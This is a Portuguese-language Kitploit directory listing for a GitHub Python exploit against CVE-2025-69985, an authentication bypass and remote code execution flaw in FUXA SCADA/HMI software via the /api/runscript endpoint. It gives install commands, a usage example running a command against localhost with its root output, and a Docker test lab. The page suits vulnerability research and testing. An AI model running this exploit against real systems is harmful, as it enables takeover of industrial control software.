Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-69985 — Exploit Python para CVE-2025-69985 direcionado ao software SCADA FUXA. Envia payload JSON elaborado para o endpoint /api/runscript para contornar a autenticação e alcançar execução remota de código. | Kitploit
Ferramentas/GitHubGitHub/joshuavanderpoll/cve-2025-69985
Análise de VulnerabilidadesExploraçãoSegurança SCADA/ICSExploração de Aplicações WebAutenticaçãoFerramenta de Acesso Remoto
GitHubjoshuavanderpoll/cve-2025-69985

CVE-2025-69985

Exploit Python para CVE-2025-69985 direcionado ao software SCADA FUXA. Envia payload JSON elaborado para o endpoint /api/runscript para contornar a autenticação e alcançar execução remota de código.

Ver RepositórioSite
25há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

FUXA ≤ 1.2.8 Bypass de Autenticação + RCE (CVE-2025-69985)

Python

📜 Descrição

Este exploit em Python tem como alvo a CVE-2025-69985, uma vulnerabilidade crítica de bypass de autenticação no FUXA (software SCADA/HMI baseado na web) versões ≤ 1.2.8. Ao enviar um payload JSON malicioso com código Node.js embutido para o endpoint desprotegido /api/runscript, ele consegue execução remota de comandos como o processo FUXA — capturando todo o stdout/stderr de forma síncrona na resposta.

🛠️ Instalação

[!NOTE] Para garantir um ambiente limpo e isolado para as dependências do projeto, é recomendado usar o módulo venv do Python.

OSX/Linux

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2025-69985.git
cd CVE-2025-69985
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt

Windows

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2025-69985.git
cd CVE-2025-69985
python -m venv .venv 
.venv\Scripts\activate
pip3 install -r requirements.txt

⚙️ Uso

root@kitploit:~
python3 CVE-2025-69985.py -u http://localhost:1881/ -c whoami

 Target : http://localhost:1881
 Command: whoami

[*] Preparando payload → executando: whoami
[*] Enviando requisição de exploit para /api/runscript ...
[*] Status da resposta: 200
[+] Comando executado com sucesso (bypass CVE-2025-69985)!

=== SAÍDA DO COMANDO ===
"root\n"
======================


======================================================================
 Exploit concluído!.
======================================================================

🐋 PoC com Docker

root@kitploit:~
cd docker/
docker compose down
docker compose up -d
# Você pode testar em --url http://127.0.0.1:1881/

💻 Exemplo

Executar PoC

📢 Aviso Legal

Esta ferramenta é fornecida apenas para fins educacionais e de pesquisa. O criador não assume nenhuma responsabilidade por qualquer uso indevido ou dano causado pela ferramenta.

Baixar ferramenta